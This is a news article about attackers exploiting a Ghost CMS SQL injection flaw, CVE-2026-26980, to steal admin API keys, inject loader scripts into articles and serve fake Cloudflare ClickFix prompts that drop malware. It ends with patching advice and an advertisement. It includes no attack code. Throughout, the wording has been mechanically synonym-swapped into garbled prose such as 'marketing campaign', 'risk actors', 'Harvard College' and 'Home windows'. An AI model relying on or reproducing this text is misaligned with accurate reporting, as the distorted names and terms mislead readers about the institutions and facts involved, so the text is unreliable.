A big-scale marketing campaign is exploiting a vital SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix assault flows.
The marketing campaign was found by XLab risk intelligence researchers at Chinese language cybersecurity firm Qianxin, who confirmed influence on greater than 700 domains, together with college portals, AI/SaaS corporations, media retailers, fintech companies, security websites, and private blogs.
Based on the researchers, risk actors planted malicious code on the web sites of Harvard College, Oxford College, Auburn College, and DuckDuckGo.
Supply: XLab
CVE-2026-26980 impacts Ghost 3.24.0 via 6.19.0, and permits unauthenticated attackers to learn arbitrary knowledge from the web site database, together with the admin API keys.
This key provides administration entry to customers, articles, and themes, and can be utilized to switch article pages.
Though the repair for the problem was launched on February 19 in Ghost CMS model 6.19.1, many websites failed to put in the security replace.
SentinelOne revealed on February 27 particulars about CVE-2026-26980 being exploited in assaults and the way incidents might be detected. The researchers noticed no less than two distinct exercise clusters concentrating on susceptible Ghost websites, typically re-infecting the identical domains with completely different scripts after cleanup, or one cleansing the script of the opposite to inject its personal.
Supply: XLab
Attack chain
The assaults that XLab noticed start by exploiting CVE-2026-26980 to steal the admin API keys, after which use the elevated rights to inject malicious JavaScript into articles.
The JavaScript code is a light-weight loader that fetches second-stage code from the attacker’s infrastructure, which is basically a cloaking script that fingerprints guests to find out whether or not they qualify as targets.
Guests passing the verification are served a faux Cloudflare immediate loaded by way of an iframe on prime of the article web page, which incorporates the ClickFix lure.
Supply: XLab
The web page instructs victims to confirm that they’re human by pasting a offered command on their Home windows command immediate, which drops a payload on their techniques.
XLab has noticed a number of payloads being utilized in these assaults, together with DLL loaders, JavaScript droppers, and an Electron-based malware pattern named UtilifySetup.exe.
.jpg)
Supply: XLab
Mitigating the danger
Crucial plan of action for Ghost CMS web site directors is to improve to model 6.19.1 or later and rotate all keys used beforehand, as they could have been uncovered.
XLab offered a listing of indicators of compromise (IoCs), together with injected scripts, so a radical evaluate of the web sites is required to find and take away them.
The researchers advocate that web site homeowners keep a 30-day report of admin API name logs to allow a dependable retrospective investigation.
Automated pentesting instruments ship actual worth, however they have been constructed to reply one query: can an attacker transfer via the community? They weren’t constructed to check whether or not your controls block threats, your detection guidelines fireplace, or your cloud configs maintain.
This information covers the 6 surfaces you really must validate.
Obtain Now
